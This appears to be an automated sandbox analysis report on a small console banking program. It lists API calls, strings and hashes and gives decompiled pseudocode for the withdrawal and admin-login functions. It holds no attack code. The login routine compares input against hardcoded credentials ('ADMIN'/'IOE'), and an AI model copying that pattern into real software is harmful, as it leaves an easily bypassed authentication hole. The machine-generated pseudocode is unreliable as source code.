                                              0x00d83a24

                                              APIs
                                                • Part of subcall function 00D81320: _wprintf.LIBCMT ref: 00D8133D
                                                • Part of subcall function 00D81320: _wprintf.LIBCMT ref: 00D8137B
                                                • Part of subcall function 00D81320: _wprintf.LIBCMT ref: 00D8139C
                                                • Part of subcall function 00D81320: _wprintf.LIBCMT ref: 00D81410
                                                • Part of subcall function 00D81320: _wprintf.LIBCMT ref: 00D81433
                                                • Part of subcall function 00D81250: GetStdHandle.KERNEL32(000000F5,00000000,?,00D81333,?,?,?,00D811CF), ref: 00D81271
                                                • Part of subcall function 00D81250: SetConsoleCursorPosition.KERNEL32(00000000,?,00D81333,?,?,?,00D811CF), ref: 00D81278
                                              • _wprintf.LIBCMT ref: 00D83607
                                              • _wprintf.LIBCMT ref: 00D8361D
                                                • Part of subcall function 00D870FC: __stbuf.LIBCMT ref: 00D87148
                                                • Part of subcall function 00D870FC: __output_s_l.LIBCMT ref: 00D87162
                                                • Part of subcall function 00D870FC: __ftbuf.LIBCMT ref: 00D87176
                                              • _wscanf.LIBCMT ref: 00D8362F
                                                • Part of subcall function 00D8732B: _vwscanf.LIBCMT ref: 00D8733C
                                              • _wprintf.LIBCMT ref: 00D83645
                                                • Part of subcall function 00D81290: _wprintf.LIBCMT ref: 00D812C9
                                              • _wprintf.LIBCMT ref: 00D83678
                                              • _wprintf.LIBCMT ref: 00D83803
                                              • _wprintf.LIBCMT ref: 00D83819
                                              • _wprintf.LIBCMT ref: 00D83847
                                                • Part of subcall function 00D83D80: _wprintf.LIBCMT ref: 00D83DC1
                                                • Part of subcall function 00D83D80: _wprintf.LIBCMT ref: 00D83DF4
                                                • Part of subcall function 00D83D80: _wprintf.LIBCMT ref: 00D83E0C
                                                • Part of subcall function 00D83D80: _wscanf.LIBCMT ref: 00D83E20
                                                • Part of subcall function 00D83D80: _wscanf.LIBCMT ref: 00D83E34
                                                • Part of subcall function 00D83D80: _wprintf.LIBCMT ref: 00D83E4A
                                                • Part of subcall function 00D83D80: _wscanf.LIBCMT ref: 00D83E5B
                                                • Part of subcall function 00D83D80: _wprintf.LIBCMT ref: 00D83E71
                                                • Part of subcall function 00D83D80: _wscanf.LIBCMT ref: 00D83E82
                                              • _wprintf.LIBCMT ref: 00D8385F
                                              • _wprintf.LIBCMT ref: 00D8368E
                                                • Part of subcall function 00D87751: _doexit.LIBCMT ref: 00D8775B
                                              • _swscanf.LIBCMT ref: 00D836D5
                                              • _wprintf.LIBCMT ref: 00D83742
                                              • __wstrtime.LIBCMT ref: 00D8375F
                                              • _wprintf.LIBCMT ref: 00D8377F
                                              • _wprintf.LIBCMT ref: 00D83795
                                              • _wprintf.LIBCMT ref: 00D837AB
                                              • _wprintf.LIBCMT ref: 00D837C1
                                              • _wprintf.LIBCMT ref: 00D837D7
                                              • _wprintf.LIBCMT ref: 00D837ED
                                                • Part of subcall function 00D82080: _wprintf.LIBCMT ref: 00D8209F
                                                • Part of subcall function 00D82080: _wprintf.LIBCMT ref: 00D820DE
                                                • Part of subcall function 00D82080: _wprintf.LIBCMT ref: 00D820FF
                                                • Part of subcall function 00D82080: __wstrtime.LIBCMT ref: 00D8210C
                                                • Part of subcall function 00D82080: _wprintf.LIBCMT ref: 00D82128
                                                • Part of subcall function 00D82080: __wstrtime.LIBCMT ref: 00D82135
                                                • Part of subcall function 00D82080: _wprintf.LIBCMT ref: 00D82168
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.341239813.0000000000D81000.00000020.00020000.sdmp, Offset: 00D80000, based on PE: true
                                              • Associated: 00000000.00000002.341218726.0000000000D80000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.341301778.0000000000D98000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.341314232.0000000000D9F000.00000008.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.341338176.0000000000DA1000.00000004.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.341351840.0000000000DA5000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: _wprintf$_wscanf$__wstrtime$ConsoleCursorHandlePosition__ftbuf__output_s_l__stbuf_doexit_swscanf_vwscanf
                                              • String ID: %s %s %s$%s %s %s %s$%s %s %s %s$0$1. Create New Account$2. Cash Deposit$3. Cash Withdrawl$4. Fund Transfer$5. Account information$6. Transaction information$7. Log out$8. Exit$Are you sure you want to Log out? <Y/N> : $Are you sure you want to exit? <Y/N> : $Enter User name : $LOG.DAT$LOG.DAT$N$Only THREE attempts shall be allowed to enter username and password.$Password : $Press ENTER to exit the program...$Press a choice between the range [1-8] $Press any key to return to main menu...$USER.DAT$Your input is out of range! Enter a choice between 1 to 8!
                                              • API String ID: 1611355571-1720101819
                                              • Opcode ID: 0e7d5c12990418675da693413f6fe967d808c49bc0045fce08a784786632eeaf
                                              • Instruction ID: 9b52833a56aaceef58b42834f6c46fb26673c79487fcf4c9df83a205b8a98764
                                              • Opcode Fuzzy Hash: 0e7d5c12990418675da693413f6fe967d808c49bc0045fce08a784786632eeaf
                                              • Instruction Fuzzy Hash: 47A15FB1E84305AAEB10B7A49C43BAE7274DF51F14F144035F609B92C2EAB1E61D877B
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00D84980, Relevance: 65.1, APIs: 17, Strings: 20, Instructions: 328COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 43%
                                              			E00D84980(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				char _v5;
				char _v12;
				intOrPtr _v16;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v42;
				char _v62;
				char _v112;
				char _v113;
				char _v125;
				char _v140;
				char _v170;
				char _v200;
				char _v208;
				char _v244;
				char _v324;
				char _v376;
				char _v456;
				void* __ebp;
				intOrPtr _t64;
				intOrPtr _t70;
				intOrPtr _t75;
				void* _t76;
				intOrPtr _t77;
				void* _t81;
				char _t97;
				intOrPtr _t99;
				void* _t104;
				intOrPtr _t105;
				intOrPtr _t110;
				void* _t117;
				void* _t122;
				void* _t127;
				intOrPtr _t147;
				intOrPtr _t148;
				intOrPtr _t168;
				intOrPtr _t173;
				void* _t177;
				void* _t180;
				void* _t184;
				void* _t185;
				void* _t193;
				void* _t195;
				void* _t196;
				void* _t205;

				_t215 = __fp0;
				_t176 = __esi;
				_t175 = __edi;
				_t132 = __ecx;
				_t131 = __ebx;
				_v16 = 0;
				E00D82080(__ecx, __edi, __esi, __eflags, __fp0);
				E00D81250(5, 0xa);
				_push("Withdraw from A/C number          : ");
				E00D870FC(__ebx, __edi, __esi, __eflags);
				E00D8732B("%s",  &_v28);
				_t64 = E00D86E91("ACCOUNT.DAT", "r");
				_t180 = _t177 + 0x14;
				 *0xda2f28 = _t64;
				_t214 = _v16;
				if(_v16 == 0) {
					E00D82080(_t132, __edi, __esi, _t214, __fp0);
					E00D81250(0x14, 0xc);
					_push("Given A/C number does not exits!");
					return E00D870FC(__ebx, _t175, _t176, _t214);
				}
				E00D81250(0x32, 0xa);
				_push( &_v376);
				_push("[ %s ]");
				E00D870FC(__ebx, __edi, __esi, __eflags);
				E00D81250(5, 0xc);
				_push("Amount to be Withdrawn (in NRs.)  : ");
				E00D870FC(__ebx, _t175, _t176, __eflags);
				E00D8732B("%f",  &_v12);
				_t70 = E00D86E91("ACCOUNT.DAT", "r");
				_t184 = _t180 + 0x1c;
				 *0xda2f28 = _t70;
				_v16 = 0;
				while(1) {
					_push( &_v32);
					_push( &_v36);
					_push( &_v40);
					_push( &_v42);
					_push( &_v140);
					_push( &_v113);
					_push( &_v62);
					_push( &_v112);
					_push( &_v125);
					_push( &_v170);
					_push( &_v200);
					_t75 =  *0xda2f28; // 0x0
					_t76 = E00D86FC1(_t75, "%s %s %s %s %s %s %c %s %c %f %f %f\n",  &_v208);
					_t185 = _t184 + 0x38;
					__eflags = _t76 - 0xffffffff;
					if(__eflags == 0) {
						break;
					}
					_t122 = E00D881D0( &_v208,  &_v28);
					_t184 = _t185 + 8;
					__eflags = _t122;
					if(__eflags == 0) {
						asm("movss xmm0, [ebp-0x8]");
						asm("comiss xmm0, [ebp-0x1c]");
						if(__eflags > 0) {
							E00D82080( &_v28, _t175, _t176, __eflags, _t215);
							E00D81250(0x14, 0xc);
							asm("cvtss2sd xmm0, [ebp-0x1c]");
							asm("movsd [esp], xmm0");
							_push("Sorry, the current balance is Rs. %.2f only!");
							E00D870FC(_t131, _t175, _t176, __eflags);
							E00D81250(0x19, 0xe);
							_push("Transaction NOT completed!");
							_t127 = E00D870FC(_t131, _t175, _t176, __eflags);
							_v16 = 1;
							return _t127;
						}
					}
				}
				_t77 =  *0xda2f28; // 0x0
				_push(_t77);
				E00D86D56(_t131, _t175, _t176, __eflags);
				E00D82080( &_v200, _t175, _t176, __eflags, _t215);
				E00D81250(0x1e, 0xa);
				_push("Confirm Transaction");
				_t81 = E00D870FC(_t131, _t175, _t176, __eflags);
				asm("movss xmm0, [ebp-0x8]");
				asm("movss [esp], xmm0");
				E00D81810(_t81,  &_v244);
				E00D81250(3, 0xc);
				_push( &_v376);
				_push( &_v28);
				E00D870FC(_t131, _t175, _t176, __eflags);
				asm("cvtss2sd xmm0, [ebp-0x8]");
				asm("movsd [esp], xmm0");
				E00D81AD0( &_v456, "%s to be Withdrawn from A/C number : %s [%s]",  &_v244);
				E00D880E0( &_v324,  &_v456);
				E00D880E0( &_v324, "]");
				E00D81250(0x28 - (E00D88260( &_v324) >> 1), 0xe);
				_push( &_v324);
				E00D871C9(_t131, _t175, _t176, __eflags);
				E00D81250(8, 0x11);
				_push("Are you sure you want to perform this tranasction? <Y/N>");
				E00D870FC(_t131, _t175, _t176, __eflags);
				_t193 = _t185 + 0x14 - 8 + 0x1c;
				_t97 = _v5;
				__eflags = _t97 - 0x59;
				if(_t97 == 0x59) {
					L10:
					 *0xda2f28 = E00D86E91("ACCOUNT.DAT", "r");
					_t99 = E00D86E91("TEMP.DAT", "w");
					_t195 = _t193 + 0x10;
					 *0xda2f24 = _t99;
					_v16 = 0;
					while(1) {
						_push( &_v32);
						_push( &_v36);
						_push( &_v40);
						_push( &_v42);
						_push( &_v140);
						_push( &_v113);
						_push( &_v62);
						_push( &_v112);
						_push( &_v125);
						_push( &_v170);
						_push( &_v200);
						_t168 =  *0xda2f28; // 0x0
						_t104 = E00D86FC1(_t168, "%s %s %s %s %s %s %c %s %c %f %f %f\n",  &_v208);
						_t196 = _t195 + 0x38;
						__eflags = _t104 - 0xffffffff;
						if(__eflags == 0) {
							break;
						}
						_t117 = E00D881D0( &_v208,  &_v28);
						_t205 = _t196 + 8;
						__eflags = _t117;
						if(__eflags == 0) {
							asm("movss xmm0, [ebp-0x24]");
							asm("subss xmm0, [ebp-0x8]");
							asm("movss [ebp-0x24], xmm0");
						}
						asm("movss xmm0, [0xd98210]");
						asm("comiss xmm0, [ebp-0x24]");
						if(__eflags > 0) {
							asm("movss xmm0, [ebp-0x20]");
							asm("addss xmm0, [ebp-0x24]");
							asm("movss [ebp-0x20], xmm0");
							asm("movss xmm0, [0xd98210]");
							asm("movss [ebp-0x24], xmm0");
						}
						asm("movss xmm0, [ebp-0x24]");
						asm("addss xmm0, [ebp-0x20]");
						asm("movss [ebp-0x1c], xmm0");
						asm("cvtss2sd xmm0, [ebp-0x1c]");
						asm("movsd [esp], xmm0");
						asm("cvtss2sd xmm0, [ebp-0x20]");
						asm("movsd [esp], xmm0");
						asm("cvtss2sd xmm0, [ebp-0x24]");
						asm("movsd [esp], xmm0");
						_push(_v42);
						_push( &_v140);
						_push(_v113);
						_push( &_v62);
						_push( &_v112);
						_push( &_v125);
						_push( &_v170);
						_push( &_v200);
						_push( &_v208);
						_push("%s %s %s %s %s %s %c %s %c %.2f %.2f %.2f\n");
						_t173 =  *0xda2f24; // 0x0
						_push(_t173);
						E00D86EA6(_t131, _t175, _t176, __eflags);
						_t195 = _t205 - 0xfffffffffffffff8 + 0x44;
					}
					_t105 =  *0xda2f24; // 0x0
					_push(_t105);
					E00D86D56(_t131, _t175, _t176, __eflags);
					_t147 =  *0xda2f28; // 0x0
					_push(_t147);
					E00D86D56(_t131, _t175, _t176, __eflags);
					 *0xda2f28 = E00D86E91("TRANSACTION.DAT", "a");
					E00D883B7(__eflags, 0xda2f30);
					_push(0xda2ee4);
					asm("cvtss2sd xmm0, [ebp-0x8]");
					asm("movsd [esp], xmm0");
					_push(0xda2f30);
					_push(0xda2f40);
					_push("Cash+Withdrawn");
					_push( &_v28);
					_push("%s %s %s %s %.2f %s\n");
					_t110 =  *0xda2f28; // 0x0
					_push(_t110);
					E00D86EA6(_t131, _t175, _t176, __eflags);
					_t148 =  *0xda2f28; // 0x0
					_push(_t148);
					E00D86D56(_t131, _t175, _t176, __eflags);
					E00D82080(_t148, _t175, _t176, __eflags, _t215);
					E00D81250(0x14, 0xc);
					_push("Transaction completed successfully!");
					return E00D870FC(_t131, _t175, _t176, __eflags);
				}
				__eflags = _v5 - 0x79;
				if(_v5 == 0x79) {
					goto L10;
				}
				return _t97;
			}


















































                                              0x00d84980
                                              0x00d84980
                                              0x00d84980
                                              0x00d84980
                                              0x00d84980
                                              0x00d84989
                                              0x00d84990
                                              0x00d84999
                                              0x00d8499e
                                              0x00d849a3
                                              0x00d849b4
                                              0x00d849c6
                                              0x00d849cb
                                              0x00d849ce
                                              0x00d849d3
                                              0x00d849d7
                                              0x00d849d9
                                              0x00d849e2
                                              0x00d849e7
                                              0x00000000
                                              0x00d849f1
                                              0x00d849fd
                                              0x00d84a08
                                              0x00d84a09
                                              0x00d84a0e
                                              0x00d84a1a
                                              0x00d84a1f
                                              0x00d84a24
                                              0x00d84a35
                                              0x00d84a47
                                              0x00d84a4c
                                              0x00d84a4f
                                              0x00d84a54
                                              0x00d84a5b
                                              0x00d84a5e
                                              0x00d84a62
                                              0x00d84a66
                                              0x00d84a6a
                                              0x00d84a71
                                              0x00d84a75
                                              0x00d84a79
                                              0x00d84a7d
                                              0x00d84a81
                                              0x00d84a88
                                              0x00d84a8f
                                              0x00d84a9c
                                              0x00d84aa2
                                              0x00d84aa7
                                              0x00d84aaa
                                              0x00d84aad
                                              0x00000000
                                              0x00000000
                                              0x00d84aba
                                              0x00d84abf
                                              0x00d84ac2
                                              0x00d84ac4
                                              0x00d84ac6
                                              0x00d84acb
                                              0x00d84acf
                                              0x00d84ad1
                                              0x00d84ada
                                              0x00d84adf
                                              0x00d84ae7
                                              0x00d84aec
                                              0x00d84af1
                                              0x00d84afd
                                              0x00d84b02
                                              0x00d84b07
                                              0x00d84b0f
                                              0x00000000
                                              0x00d84b0f
                                              0x00d84acf
                                              0x00d84b1b
                                              0x00d84b20
                                              0x00d84b25
                                              0x00d84b26
                                              0x00d84b2e
                                              0x00d84b37
                                              0x00d84b3c
                                              0x00d84b41
                                              0x00d84b46
                                              0x00d84b4b
                                              0x00d84b57
                                              0x00d84b60
                                              0x00d84b6b
                                              0x00d84b6f
                                              0x00d84b7c
                                              0x00d84b8b
                                              0x00d84b93
                                              0x00d84b98
                                              0x00d84bab
                                              0x00d84bbf
                                              0x00d84be2
                                              0x00d84bed
                                              0x00d84bee
                                              0x00d84bfa
                                              0x00d84bff
                                              0x00d84c04
                                              0x00d84c09
                                              0x00d84c0c
                                              0x00d84c10
                                              0x00d84c13
                                              0x00d84c22
                                              0x00d84c34
                                              0x00d84c43
                                              0x00d84c48
                                              0x00d84c4b
                                              0x00d84c50
                                              0x00d84c57
                                              0x00d84c5a
                                              0x00d84c5e
                                              0x00d84c62
                                              0x00d84c66
                                              0x00d84c6d
                                              0x00d84c71
                                              0x00d84c75
                                              0x00d84c79
                                              0x00d84c7d
                                              0x00d84c84
                                              0x00d84c8b
                                              0x00d84c98
                                              0x00d84c9f
                                              0x00d84ca4
                                              0x00d84ca7
                                              0x00d84caa
                                              0x00000000
                                              0x00000000
                                              0x00d84cbb
                                              0x00d84cc0
                                              0x00d84cc3
                                              0x00d84cc5
                                              0x00d84cc7
                                              0x00d84ccc
                                              0x00d84cd1
                                              0x00d84cd1
                                              0x00d84cd6
                                              0x00d84cde
                                              0x00d84ce2
                                              0x00d84ce4
                                              0x00d84ce9
                                              0x00d84cee
                                              0x00d84cf3
                                              0x00d84cfb
                                              0x00d84cfb
                                              0x00d84d00
                                              0x00d84d05
                                              0x00d84d0a
                                              0x00d84d0f
                                              0x00d84d17
                                              0x00d84d1c
                                              0x00d84d24
                                              0x00d84d29
                                              0x00d84d31
                                              0x00d84d3a
                                              0x00d84d41
                                              0x00d84d46
                                              0x00d84d4a
                                              0x00d84d4e
                                              0x00d84d52
                                              0x00d84d59
                                              0x00d84d60
                                              0x00d84d67
                                              0x00d84d68
                                              0x00d84d6d
                                              0x00d84d73
                                              0x00d84d74
                                              0x00d84d79
                                              0x00d84d79
                                              0x00d84d81
                                              0x00d84d86
                                              0x00d84d87
                                              0x00d84d8f
                                              0x00d84d95
                                              0x00d84d96
                                              0x00d84db0
                                              0x00d84dba
                                              0x00d84dc2
                                              0x00d84dc7
                                              0x00d84dcf
                                              0x00d84dd4
                                              0x00d84dd9
                                              0x00d84dde
                                              0x00d84de6
                                              0x00d84de7
                                              0x00d84dec
                                              0x00d84df1
                                              0x00d84df2
                                              0x00d84dfa
                                              0x00d84e00
                                              0x00d84e01
                                              0x00d84e09
                                              0x00d84e12
                                              0x00d84e17
                                              0x00000000
                                              0x00d84e21
                                              0x00d84c19
                                              0x00d84c1c
                                              0x00000000
                                              0x00000000
                                              0x00d84e27

                                              APIs
                                                • Part of subcall function 00D82080: _wprintf.LIBCMT ref: 00D8209F
                                                • Part of subcall function 00D82080: _wprintf.LIBCMT ref: 00D820DE
                                                • Part of subcall function 00D82080: _wprintf.LIBCMT ref: 00D820FF
                                                • Part of subcall function 00D82080: __wstrtime.LIBCMT ref: 00D8210C
                                                • Part of subcall function 00D82080: _wprintf.LIBCMT ref: 00D82128
                                                • Part of subcall function 00D82080: __wstrtime.LIBCMT ref: 00D82135
                                                • Part of subcall function 00D82080: _wprintf.LIBCMT ref: 00D82168
                                                • Part of subcall function 00D81250: GetStdHandle.KERNEL32(000000F5,00000000,?,00D81333,?,?,?,00D811CF), ref: 00D81271
                                                • Part of subcall function 00D81250: SetConsoleCursorPosition.KERNEL32(00000000,?,00D81333,?,?,?,00D811CF), ref: 00D81278
                                              • _wprintf.LIBCMT ref: 00D849A3
                                              • _wscanf.LIBCMT ref: 00D849B4
                                                • Part of subcall function 00D8732B: _vwscanf.LIBCMT ref: 00D8733C
                                                • Part of subcall function 00D86E91: __fsopen.LIBCMT ref: 00D86E9C
                                              • _wprintf.LIBCMT ref: 00D849EC
                                                • Part of subcall function 00D870FC: __stbuf.LIBCMT ref: 00D87148
                                                • Part of subcall function 00D870FC: __output_s_l.LIBCMT ref: 00D87162
                                                • Part of subcall function 00D870FC: __ftbuf.LIBCMT ref: 00D87176
                                              • _wprintf.LIBCMT ref: 00D84A0E
                                              • _wprintf.LIBCMT ref: 00D84A24
                                              • _wscanf.LIBCMT ref: 00D84A35
                                              • _swscanf.LIBCMT ref: 00D84AA2
                                              • _wprintf.LIBCMT ref: 00D84AF1
                                              • _wprintf.LIBCMT ref: 00D84B07
                                                • Part of subcall function 00D82080: _wprintf.LIBCMT ref: 00D820F2
                                              Strings
                                              • Given A/C number does not exits!, xrefs: 00D849E7
                                              • TRANSACTION.DAT, xrefs: 00D84DA3
                                              • Amount to be Withdrawn (in NRs.) : , xrefs: 00D84A1F
                                              • Withdraw from A/C number : , xrefs: 00D8499E
                                              • Cash+Withdrawn, xrefs: 00D84DDE
                                              • Transaction completed successfully!, xrefs: 00D84E17
                                              • %s %s %s %s %s %s %c %s %c %f %f %f, xrefs: 00D84C93
                                              • ACCOUNT.DAT, xrefs: 00D84A42
                                              • Confirm Transaction, xrefs: 00D84B3C
                                              • %s to be Withdrawn from A/C number : %s [%s], xrefs: 00D84B77
                                              • Transaction NOT completed!, xrefs: 00D84B02
                                              • Sorry, the current balance is Rs. %.2f only!, xrefs: 00D84AEC
                                              • Are you sure you want to perform this tranasction? <Y/N>, xrefs: 00D84BFF
                                              • [ %s ], xrefs: 00D84A09
                                              • %s %s %s %s %s %s %c %s %c %.2f %.2f %.2f, xrefs: 00D84D68
                                              • ACCOUNT.DAT, xrefs: 00D849C1
                                              • %s %s %s %s %s %s %c %s %c %f %f %f, xrefs: 00D84A97
                                              • TEMP.DAT, xrefs: 00D84C3E
                                              • %s %s %s %s %.2f %s, xrefs: 00D84DE7
                                              • ACCOUNT.DAT, xrefs: 00D84C27
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.341239813.0000000000D81000.00000020.00020000.sdmp, Offset: 00D80000, based on PE: true
                                              • Associated: 00000000.00000002.341218726.0000000000D80000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.341301778.0000000000D98000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.341314232.0000000000D9F000.00000008.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.341338176.0000000000DA1000.00000004.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.341351840.0000000000DA5000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: _wprintf$__wstrtime_wscanf$ConsoleCursorHandlePosition__fsopen__ftbuf__output_s_l__stbuf_swscanf_vwscanf
                                              • String ID: %s %s %s %s %.2f %s$%s %s %s %s %s %s %c %s %c %.2f %.2f %.2f$%s %s %s %s %s %s %c %s %c %f %f %f$%s %s %s %s %s %s %c %s %c %f %f %f$%s to be Withdrawn from A/C number : %s [%s]$ACCOUNT.DAT$ACCOUNT.DAT$ACCOUNT.DAT$Amount to be Withdrawn (in NRs.) : $Are you sure you want to perform this tranasction? <Y/N>$Cash+Withdrawn$Confirm Transaction$Given A/C number does not exits!$Sorry, the current balance is Rs. %.2f only!$TEMP.DAT$TRANSACTION.DAT$Transaction NOT completed!$Transaction completed successfully!$Withdraw from A/C number : $[ %s ]
                                              • API String ID: 427838879-2716176803
                                              • Opcode ID: aa227b98d819b58a5b03f839be7595d9e31bedd9317547cd2122e11f98559d88
                                              • Instruction ID: fe1c14c72a4f8320ea51918c358d5d4ad5009d04d1e269e3dd2926bd75b04aba
                                              • Opcode Fuzzy Hash: aa227b98d819b58a5b03f839be7595d9e31bedd9317547cd2122e11f98559d88
                                              • Instruction Fuzzy Hash: 8EC16EB2D40208AEDB11FBA5CC42FEEB778EF5A700F044659F60576181FA71A64C8B76
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00D82290, Relevance: 57.9, APIs: 17, Strings: 16, Instructions: 198COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 72%
                                              			E00D82290(void* __edi, void* __esi, void* __fp0) {
				char _v5;
				char _v6;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				signed int _v28;
				char _v31;
				char _v35;
				char _v39;
				char _v43;
				char _v47;
				char _v51;
				char _v55;
				char _v59;
				char _v60;
				char _v92;
				void* __ebp;
				void* _t50;
				void* _t74;
				void* _t78;
				void* _t85;
				void* _t94;
				void* _t95;
				void* _t96;
				void* _t100;
				void* _t101;
				void* _t106;
				void* _t116;

				_t116 = __fp0;
				_t95 = __esi;
				_t94 = __edi;
				_v60 = 0;
				_v59 = 0;
				_v55 = 0;
				_v51 = 0;
				_v47 = 0;
				_v43 = 0;
				_v39 = 0;
				_v35 = 0;
				_v31 = 0;
				_v20 = 0;
				_v16 = 0;
				do {
					_v20 = 0;
					E00D81250(7, 5);
					_push("Only THREE attempts shall be allowed to enter username and password.");
					E00D870FC(_t85, _t94, _t95, 0);
					E00D81320(_t94, _t95, 0, 0xa, 8, 0x46, 0xf);
					E00D81250(0x17, 0xa);
					_push("Enter User name : ");
					E00D870FC(_t85, _t94, _t95, 0);
					E00D8732B("%s",  &_v92);
					E00D81250(0x17, 0xc);
					_push("Password        : ");
					E00D870FC(_t85, _t94, _t95, 0);
					_t100 = _t96 + 0x14;
					E00D81290(_t94, _t95,  &_v60);
					_v16 = _v16 + 1;
					_t110 = _v16 - 3;
					if(_v16 == 3) {
						E00D82080( &_v92, _t94, _t95, _t110, _t116);
						E00D81250(0x19, 8);
						_push(0xd9f224);
						E00D870FC(_t85, _t94, _t95, _t110);
						E00D81250(0x16, 0xb);
						_push("Press any key to exit the program...");
						E00D870FC(_t85, _t94, _t95, _t110);
						_t100 = _t100 + 8;
						E00D87751(0);
					}
					_t87 =  &_v92;
					_t50 = E00D881D0( &_v92, "ADMIN");
					_t101 = _t100 + 8;
					if(_t50 != 0) {
						L6:
						E00D82080(_t87, _t94, _t95, __eflags, _t116);
						E00D81250(0x19, 0xa);
						_push(0xd9f278);
						E00D870FC(_t85, _t94, _t95, __eflags);
						_t96 = _t101 + 4;
					} else {
						_t78 = E00D881D0( &_v60, "IOE");
						_t101 = _t101 + 8;
						if(_t78 != 0) {
							goto L6;
						} else {
							_v20 = 1;
						}
					}
					_t113 = _v20 - 1;
				} while (_v20 != 1);
				do {
					E00D82080(_t87, _t94, _t95, _t113, _t116);
					E00D81250(0x1e, 8);
					_push("1. Add User");
					E00D870FC(_t85, _t94, _t95, _t113);
					E00D81250(0x1e, 0xa);
					_push("2. Delete User");
					E00D870FC(_t85, _t94, _t95, _t113);
					E00D81250(0x1e, 0xc);
					_push("3. Edit User name / Password");
					E00D870FC(_t85, _t94, _t95, _t113);
					E00D81250(0x1e, 0xe);
					_push("4. View User Log");
					E00D870FC(_t85, _t94, _t95, _t113);
					E00D81250(0x1e, 0x10);
					_push("5. Exit");
					E00D870FC(_t85, _t94, _t95, _t113);
					_t106 = _t96 + 0x14;
					E00D81250(1, 0x11);
					_v24 = 0;
					while(1) {
						_t114 = _v24 - 0x4e;
						if(_v24 >= 0x4e) {
							break;
						}
						_push("_");
						E00D870FC(_t85, _t94, _t95, _t114);
						_t106 = _t106 + 4;
						_v24 = _v24 + 1;
					}
					E00D81250(0x17, 0x13);
					_push(" Press a number between the range [1 -5]  ");
					E00D870FC(_t85, _t94, _t95, __eflags);
					_t96 = _t106 + 4;
					_t89 = _v6 - 0x30;
					_v28 = _v6 - 0x30;
					_v12 = _v28;
					_v12 = _v12 - 1;
					__eflags = _v12 - 4;
					if(__eflags > 0) {
						E00D82080(_t89, _t94, _t95, __eflags, _t116);
						E00D81250(0xa, 0xa);
						_push("Your input is out of range! Enter a choice between 1 to 5!");
						E00D870FC(_t85, _t94, _t95, __eflags);
						E00D81250(0xf, 0xc);
						_push("Press ENTER to return to main menu...");
						_t74 = E00D870FC(_t85, _t94, _t95, __eflags);
						_t96 = _t96 + 8;
					} else {
						switch( *((intOrPtr*)(_v12 * 4 +  &M00D82548))) {
							case 0:
								_t74 = E00D82560(_t85, _t94, _t95, _t116);
								goto L23;
							case 1:
								E00D827A0(__ebx, __ecx, __edi, __esi, __fp0);
								goto L23;
							case 2:
								E00D82AB0(__ebx, __edi, __esi, __fp0);
								goto L23;
							case 3:
								E00D82E20(__ebx, __edx, __eflags, __fp0);
								goto L23;
							case 4:
								E00D82080(__ecx, __edi, __esi, __eflags, __fp0);
								E00D81250(0xf, 0xa);
								_push("Are you sure you want to exit? <Y/N> : ");
								E00D870FC(__ebx, __edi, __esi, __eflags);
								__esp = __esp + 4;
								__edx = _v5;
								__eflags = _v5 - 0x59;
								if(_v5 == 0x59) {
									L20:
									E00D87751(0);
								} else {
									__eflags = _v5 - 0x79;
									if(_v5 == 0x79) {
										goto L20;
									}
								}
								goto L23;
						}
					}
					L23:
					_t87 = 1;
					__eflags = 1;
				} while (1 != 0);
				return _t74;
			}
































                                              0x00d82290
                                              0x00d82290
                                              0x00d82290
                                              0x00d82296
                                              0x00d8229c
                                              0x00d8229f
                                              0x00d822a2
                                              0x00d822a5
                                              0x00d822a8
                                              0x00d822ab
                                              0x00d822ae
                                              0x00d822b1
                                              0x00d822b4
                                              0x00d822bb
                                              0x00d822c2
                                              0x00d822c2
                                              0x00d822cd
                                              0x00d822d2
                                              0x00d822d7
                                              0x00d822e7
                                              0x00d822f0
                                              0x00d822f5
                                              0x00d822fa
                                              0x00d8230b
                                              0x00d82317
                                              0x00d8231c
                                              0x00d82321
                                              0x00d82326
                                              0x00d8232d
                                              0x00d82338
                                              0x00d8233b
                                              0x00d8233f
                                              0x00d82341
                                              0x00d8234a
                                              0x00d8234f
                                              0x00d82354
                                              0x00d82360
                                              0x00d82365
                                              0x00d8236a
                                              0x00d8236f
                                              0x00d82374
                                              0x00d82374
                                              0x00d8237e
                                              0x00d82382
                                              0x00d82387
                                              0x00d8238c
                                              0x00d823ac
                                              0x00d823ac
                                              0x00d823b5
                                              0x00d823ba
                                              0x00d823bf
                                              0x00d823c4
                                              0x00d8238e
                                              0x00d82397
                                              0x00d8239c
                                              0x00d823a1
                                              0x00000000
                                              0x00d823a3
                                              0x00d823a3
                                              0x00d823a3
                                              0x00d823a1
                                              0x00d823c7
                                              0x00d823c7
                                              0x00d823d1
                                              0x00d823d1
                                              0x00d823da
                                              0x00d823df
                                              0x00d823e4
                                              0x00d823f0
                                              0x00d823f5
                                              0x00d823fa
                                              0x00d82406
                                              0x00d8240b
                                              0x00d82410
                                              0x00d8241c
                                              0x00d82421
                                              0x00d82426
                                              0x00d82432
                                              0x00d82437
                                              0x00d8243c
                                              0x00d82441
                                              0x00d82448
                                              0x00d8244d
                                              0x00d8245f
                                              0x00d8245f
                                              0x00d82463
                                              0x00000000
                                              0x00000000
                                              0x00d82465
                                              0x00d8246a
                                              0x00d8246f
                                              0x00d8245c
                                              0x00d8245c
                                              0x00d82478
                                              0x00d8247d
                                              0x00d82482
                                              0x00d82487
                                              0x00d8248e
                                              0x00d82491
                                              0x00d82497
                                              0x00d824a0
                                              0x00d824a3
